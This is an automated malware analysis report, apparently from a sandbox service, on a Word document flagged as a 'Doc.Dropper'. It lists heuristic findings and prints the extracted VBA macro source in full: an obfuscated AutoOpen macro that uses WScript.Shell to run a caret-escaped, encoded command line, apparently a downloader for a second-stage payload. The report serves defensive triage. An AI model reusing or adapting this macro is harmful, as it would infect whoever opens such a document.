MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and CreateObject to execute arbitrary commands, indicated by the critical heuristics for Shell() and WScript.Shell usage. The AutoOpen macro is present, suggesting it executes upon opening the document. The primary function appears to be downloading and executing a secondary payload, as suggested by the ClamAV detection name 'Doc.Dropper'.
Heuristics 10
-
ClamAV: Doc.Dropper.Valyria-6665595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6665595-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 21614 * wbHaSs * DfiWX / wlfjDM NtLmiKwO = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 21614 * wbHaSs * DfiWX / wlfjDM NtLmiKwO = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "YBEISfwZXXh" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10584 bytes |
SHA-256: 0eee9c760f8f49623ff34a60a6db5dfd8c7d617e0b6879626e1cf64fc24c4636 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
144 of 226 identifiers look randomly generated (e.g. 'znLKzJzoudlYA'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "znLKzJzoudlYA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
Error 80496 * XVtGNU / GJcGUz / ibFhc
Error cdirr / ApSFY * Jcsqw * cVpkE
Error mGlMo / iRXmB * KVjkTi / 41263
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + " /" + "c " + " " + Chr(0 + 2 + 1 + 4 + 27) + " ^se^t"
Error 86001 * uXftQL
Error 65237 / 51968 * vRDLS / MCftpY
Error YnNiX / fbfhw
Error 48347 * BOrfwL * 84365 / lCSPk
iPhLN = " ^ ^ ^" + " ^6^bv" + "=AACA^g" + "^A^A" + "IAAC^" + "A^gA^"
Error CnWmM * zdJdWH
Error 49727 * KwZVd
TqkZmJPM = "A^" + "I^A^AC^" + "A^g^AA" + "^I^" + "A^A" + "CA^" + "g^" + "A^" + "AI^A^A"
Error wAFiQf * BqYLln * 4118 * sPcUD
Error IXMki / hjHdFJ * 78225 * IFmzEB
TcNlBV = "CA^g^AA" + "^IA" + "ACA^gA^" + "Qf^A" + "0H^A7^B" + "AaA^M^" + "G^A0" + "^B^QY^" + "AMG" + "A" + "9^B^wOA"
Error AMbLf * UBoFn
Error DwGwti / hUhntR
Error 13147 * IrBXkJ
HKPspJlirRN = "s^" + "G^AhB" + "QZ^AIHA" + "^" + "i^Bw^OA" + "^M"
Error zMPHSO / VaqFs
Error qaVcff / SOavXR
Error 58038 * RhbBl
Error FvRXf * hTUOGX * TbTjj * 93335
jCjmN = "F^AuB" + "^g^" + "YA^" + "QC^A^" + "g^" + "A^Qb^" + "A^" + "UGA^0B^" + "Q" + "^S^A^0" + "C^" + "A" + "^lB"
Error nUPbIH / OZHWz
Error 13590 / 28029
Error YGvni * oMuwWP
Error jiHTJ / BwhfM
Error 40892 / zzWLc
lPzsiUdjqEQ = "^w" + "^aA^8" + "GA2^B^g" + "^bA" + "^" + "k" + "EA7A" + "^QKA" + "^" + "M"
Error zGbKQV / csXGZ
Error 87085 / PHUAFb * 4769 / ztAtM
Error 36167 / FKjnQf
Error dKDTwP / 87355 / MQRjw / 59626
Error 78720 / pYzJNh
bskdYj = "F^A" + "^uBg^YA" + "QCAg" + "A^AL" + "A0E^A" + "vB^Q" + "W^AQC" + "AoA^QZA" + "^w^GA^" + "p^B^"
Error QjXvXi / kzihv
Error lbRPcK * DvQAjj
LzahjSi = "g" + "R^A^Q" + "G^Ah^B" + "wbAwG^A" + "u^" + "B^wdA8" + "G^AEB" + "g^LAo^"
Error 60966 * 19933 * qOcFY / 41213
NYAswfQFLbJ = "G^A^U" + "^BQ^WA" + "QC^A^7^" + "BQ^" + "eAIHA" + "^" + "0Bw^eA" + "^kC" + "^AM" + "BgQ" + "^AM^E^A" + "^kA^A^I" + "A^4^"
AAQTwY = azsTMArRGVs + iPhLN + TqkZmJPM + TcNlBV + HKPspJlirRN + jCjmN + lPzsiUdjqEQ + bskdYj + LzahjSi + NYAswfQFLbJ
Error 24984 * rRluP * uPGhpV * csNWw
Error XlHpE * isSCK / BQOGk / kWWls
Error QBwsp * kiPMHJ
End Function
Function nkWaqCkJW()
On Error Resume Next
Error 30627 / 23549 * vltwpz / 58476
Error TRzrF / IwoQfR
Error jGXzl / QvpFK / pEFBwD * hUnNl
sDmuNHIlkD = "GA^p^B" + "^AI^A" + "0^E" + "AvBQW^A" + "QC^Ao" + "^AAaA" + "^M" + "G^A^h"
Error apOMFp / zjdbzE / 15638 * Llfiz
Error VGXvhi / GknLC * 26645 * YjnzhW
Error 78341 * SmtsmV * AVzDM / GrZhj
nzHbKrHiLqL = "^BQZ" + "^A^I" + "HAvBgZ^" + "A^s" + "^DAnA" + "QZ" + "AgHAl" + "B^gLAcC" + "^Ar^Ag^" + "W^" + "Ak^"
Error 46393 / IGjjo
KVZpGBEDc = "F^A" + "^i^B^" + "AJ^AsC" + "^A" + "n^" + "A"
Error 32301 * cdiRna * sRipjN * IQrdpb
Error 88762 / kTGMpt
Error pdUIoJ / FZatn / 72944 / utmEr
Error MOPBq * 49662
TAvChlzrOmB = "^AX" + "AcC^" + "ArAwY^" + "A^" + "kG" + "A^s" + "B" + "^g^YAU^" + "HAwB^gO" + "A^Y"
Error lWMNv * ihfzzh * KzhXd * wiSqU
Error 63377 * hILzF
sKhNblmb = "H" + "A^u^" + "BQZA^QC" + "A^9A" + "wU" + "A^4G" + "Ai" + "B" + "AJ^" + "A" + "s" + "^D^AnAA" + "N^AI^D^"
Error npbTj * FmUPwt
Error OlmmO / CDWXw / ZkTKb / oSwib
OiavjV = "A" + "^yAw" + "J^A" + "A" + "C^A9" + "A^AI" + "^Ao^F^A" + "^ZB^g^Y" + "^AQC" + "^" + "A7A^QKA" + "cC^" + "A"
Error Gvjiar * KjzOYY / 71240 * hJmkX
Error 90558 / mttInl / 41436 * cjiorr
Error MGcJb * tNOHO * TqZjJz / abakq
Error iEVXRQ * YGqFSM * 14861 / cMMSvl
XGiIIZ = "^A^B" + "^wJ" + "AgC" + "^A" + "^0^B^Q" + "aA^" + "wG^Aw^" + "Bw^U^A" + "4CAn^" + "AQM"
Error 70985 / UTpcZ
XUiaiIu = "^" + "Ac^H^" + "A0" + "^A^gMAo" + "^FA^" + "H^BgN^"
Error OOHBK / ZOtCDw
Error 39691 / UoqMM / 15239 / GicoWz
Error 84126 * AiEHRa
YKsCf = "A8C^AvB" + "g" + "b^A4CA^" + "z^B" + "wb^A" + "w^G^A" + "lBAaA4" + "CA0^Bw"
nkWaqCkJW = sDmuNHIlkD + nzHbKrHiLqL + KVZpGBEDc + TAvChlzrOmB + sKhNblmb + OiavjV + XGiIIZ + XUiaiIu + YKsCf
Error lkFrvz / NdKjvW / tWrsOF / 2650
Error ClsvGv * IrRjG
Error AlXNP / BDLNzi * zJikWz / vUrAWW
Error fpQoDw * 98003
Error zzYcj / EuOfw / AtwzDZ / uJvNjj
End Function
Function TGYwfRXiBE()
On Error Resume Next
Error 92496 / HhOKYW
Error 3840 / luArSm
Error 58475 / iHufa
BcCJa = "c^" + "AUGA" + "0BwL" + "^" + "A^8" + "C^A^" + "6A^" + "AcA^Q^H" + "^A"
Error 94287 / vKatG
Error 17260 / SnnRN * lWrwA / RWsrQQ
Error 51186 * suoLPD
Error 19923 / zWLXo / 33197 / wmcLS
ARANGbrCiE = "0" + "BA^a^A^" + "A^EA^1" + "^Bw^LA" + "^" + "8G^" + "Aj^B^" + "gL" + "^" + "A^0G" + "A" + "v^" + "Bw^Y"
Error 85374 / YJlct * QzwfNz / 37867
Error 76858 * AculvC * 13974 * sWcMY
SknmGwAZaX = "A4C" + "AuBw" + "bAk" + "G^" + "A^0^B"
Error STwjTc * mLGvjH
Error 15567 * cYqwod
Error 22503 / iKdjLc
Error 41828 / ZjWzD * 48960 * jFVqDz
AwIjbj = "w" + "YA^U^GA" + "^0^BwbA" + "I^H^A" + "^wB^wb^" + "A^kGA" + "2^Bw" + "^"
Error 61894 / cuwFzp / 74399 / zLbGcN
Error aMADYW * CoYEG * 31105 * sdPdw
Error ZJNlkG / 12477
Error jwjAIL / sOmkF
HvRKw = "LA" + "^8C^A6^" + "A^AcAQ" + "H^A" + "^" + "0"
Error RtrciW * 25040 / 46961 * lLkNM
Error Pzbtf / ufomz / EfjRn * rKFhv
jYHPjrPX = "B" + "A^a" + "^" + "A^A^EA0" + "^A^wZ" + "^Aw^E^A" + "vA^Q^b" + "^A^8^G" + "Aj" + "B^" + "gLA"
Error RIBZE / ESSBcP / 29444 / BcINQC
OZthQwavt = "Y" + "H^A^l^" + "BAZ^" + "A^gGA" + "z^" + "B^Qa^A4" + "^G^Av" + "^B"
Error 31256 * csuVha * mRAPnw * MLnKQ
Error 69825 / zCJHE / nqBMsR / MnilrJ
Error 96541 / 28716
HIMdrUv = "^A^d^A4" + "CA^" + "l" + "Bw" + "ZAEG" + "^" + "Aw" + "B^" + "Q" + "^" + "Z^A^0^" + "G^A" + "v^B^Aa"
Error 60768 * AFOsov * 99612 * vsMZW
Error 98497 / wDvfOA / EYYLu * ijubH
Error 66292 * IXwRdR
Error LVPqW * PTAiA
AqupuREt = "^A0C" + "A^4^B^Q" + "YA" + "Q" + "^HA"
Error QjFIM * RzOvQ
cRjNNBOVr = "6B^w" + "^bA^8" + "C^" + "Av^A^g" + "^O" + "^AAH^A" + "0B^A^d"
Error 62363 * 96432
Error idiMDw / nRUbb
Error 94648 * QoHNM / 40289 * mFOHT
FAGWO = "^A" + "^gG^AA" + "BA^T^As" + "G^AyAw^" + "YA^"
TGYwfRXiBE = BcCJa + ARANGbrCiE + SknmGwAZaX + AwIjbj + HvRKw + jYHPjrPX + OZthQwavt + HIMdrUv + AqupuREt + cRjNNBOVr + FAGWO
Error iVmzRD * 54111
End Function
Function CZwToYDn()
On Error Resume Next
Error 75329 * VvopW
Error PjBZkB / iqcwv / dRrlGp * 52389
Error 96081 * jtaKzJ
Error sRUKm * Jkkin
AjWifqfQiS = "I" + "^G^A0A^" + "w" + "^L" + "A"
Error 18551 * KXDED
Error OTRuUf * rPUsM
TWnopnuq = "UHAlBg" + "L" + "^A" + "MH^A^" + "y^B^Q^d" + "A^8^" + "GA^s^" + "B^wb^A" + "MG^Au" + "^B^Q"
Error 16055 / iRbWF
Error 83519 / pWcQmv
lJdHKZbNL = "^ZA^YH" + "^A^lB" + "wcA^4" + "C^Ak^B" + "^A^" + "bA^kG" + "A1B^gY" + "^AE"
Error 62754 / DBtsF
Error tSTUm * mBFZm * NbVcjF / CuETPz
Error aHZmMz * LaYPCT
Error 27268 / WSTTki
hXUQrwsksTw = "G" + "Ay^BQZA" + "QH" + "A" + "v^A"
Error 74118 * bfowD * GIMuf * 74580
Error QPuDQC * 57386
zlNOAfa = "^wLA" + "^oD" + "A^" + "wB^" + "A^d" + "^AQ^HA" + "^" + "oBA^Q^"
Error 44287 * 94885
Error MKsiLz / WRWbU
Error KdTBjs / CUnVwk / 57692 * 28144
Error 85966 / jYFTj
Error BHutw / MUmWH
NXFErTT = "AkH" + "^AvA" + "^Qb" + "A8" + "^" + "GA^j^B^" + "g^LAE^" + "G^A^2" + "^B" + "^Qa^A" + "Q" + "H^A^"
Error 26009 / nKpFM
Error aHSFa / zDMJG
Error 94259 / iCcUl
FQUXDrdZ = "yB" + "w^b^AAH" + "^A^l" + "^B" + "^" + "AZ^AE" + "G^Aw^" + "Bw"
Error 21010 * lwnDHj / 17576 / zFWvz
Error hEHNk * qlPcjI
Error 76265 * XaBGZG
Error qUDvG * aaiVob
IFuapz = "^b^A^" + "I" + "^H" + "^AuBwb^" + "AkGA^" + "o^Bwc^" + "A^EG^" + "A^" + "mB^Q^" + "Y" + "^A^" + "k^GA^t^"
Error EFfIXW * bvdYO
Error 72242 / JMsIL * AAPmn / HRhNou
Error XAfFOk * DizLqG
UsbwCTso = "B^wL^" + "A^8C^" + "A^6A" + "^A" + "cAQ" + "H^A0" + "^B" + "^A^a^A" + "c" + "CA9AAT" + "A^I^E^" + "A^" + "D"
CZwToYDn = AjWifqfQiS + TWnopnuq + lJdHKZbNL + hXUQrwsksTw + zlNOAfa + NXFErTT + FQUXDrdZ + IFuapz + UsbwCTso
Error WANvA / jwjPjq / 43879 * MVcUB
End Function
Function ZAZFaKiQqLI()
On Error Resume Next
Error 80663 / 52489 / 92614 * wNRwBM
Error UijZR / DOPwf
Error PmLfN / vUDiX * 13554 * kwVrM
JFSLiBTWW = "BA^JA" + "s" + "DA^0" + "Bgb^A^U" + "G"
Error HhBqP / FjbHD / lMQvGp * AwkGmN
pVUjzo = "^A" + "pBA^b" + "^" + "A^MEA^" + "iB" + "^Q" + "Z^" + "Ac^F" + "Au^A" + "A^d" + "^A" + "^UGA"
Error 64274 / 9052
mCikrYI = "O^BAIA^" + "Q" + "^HA" + "^" + "jB^Q^Z^" + "AoGA" + "iB^w" + "bA0" + "C^A^3^" + "B^Q^"
Error 38954 * cdPUAw
Error 8101 / iBbGs / 43240 * HhhQlj
Error oDZVc / rzTrp * VdWaO * KBYbVD
TswpwBjJ = "Z^A" + "^4^GA9A" + "^" + "g^aA^Q" + "^F" + "AZ^B^A^" + "J^ ^e^" + "-" + " ^l^l^" + "e" + "^hs"
Error NNDPzG * FXmOjN / 65262 * lYMIw
Error wuYVpt * saloqH / 80473 * oJcNWi
DQTzsvVbI = "rew^o" + "^p& " + " ^f^O" + "r /^L " + "%^w ^i" + "n ( " + "^1" + "^013^ ^" + " ^ -^1" + "^" + " ^ ^ " + "0)^D"
ZAZFaKiQqLI = JFSLiBTWW + pVUjzo + mCikrYI + TswpwBjJ + DQTzsvVbI
Error uzMfN / HntcQ / qiRuH / McrXaf
End Function
Function UkMWDn()
On Error Resume Next
Error jjVCq * IaphSf / dBwfY * ziKSO
kfRnUt = "^O s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~ " + " %^w" + ", 1!" + "&" + "^I^f" + " " + "%^w =="
Error YXZjZd / bDXZa
Error auGjlZ * 41408
Error 66380 / bNoAJ
TfpJmjlLn = " " + "^" + "0 C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
Error iziZpr / FmQaiR * AKNvwZ * tBpIlW
Error wFjDQA * BjCzYF / 96990 / PajEZD
Error NhwLYA * maDJp
Error IiUjQ * 50180 * qiELl * vpREVv
JiKzIjTtOE = "=" + "% " + " " + Chr(0 + 2 + 1 + 4 + 27) + " "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
Error iTtwuY * rpjzit * oEGYN * 43002
End Function
Attribute VB_Name = "YBEISfwZXXh"
Sub AutoOpen()
On Error Resume Next
Error rONqm * CJQtzO
Error 48152 * NBlXc
Error 21614 * wbHaSs * DfiWX / wlfjDM
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + NukjzBt + AAQTwY + nkWaqCkJW + TGYwfRXiBE + CZwToYDn + ZAZFaKiQqLI + UkMWDn + XINXMRiRpSFu + IvhiVpbowuUMTR, 462569852 - 462569852)
Error ZJiKS * zwNLP * 82992 / 82141
Error 50357 * OhnqYd / LWwAUw * KXvbkQ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.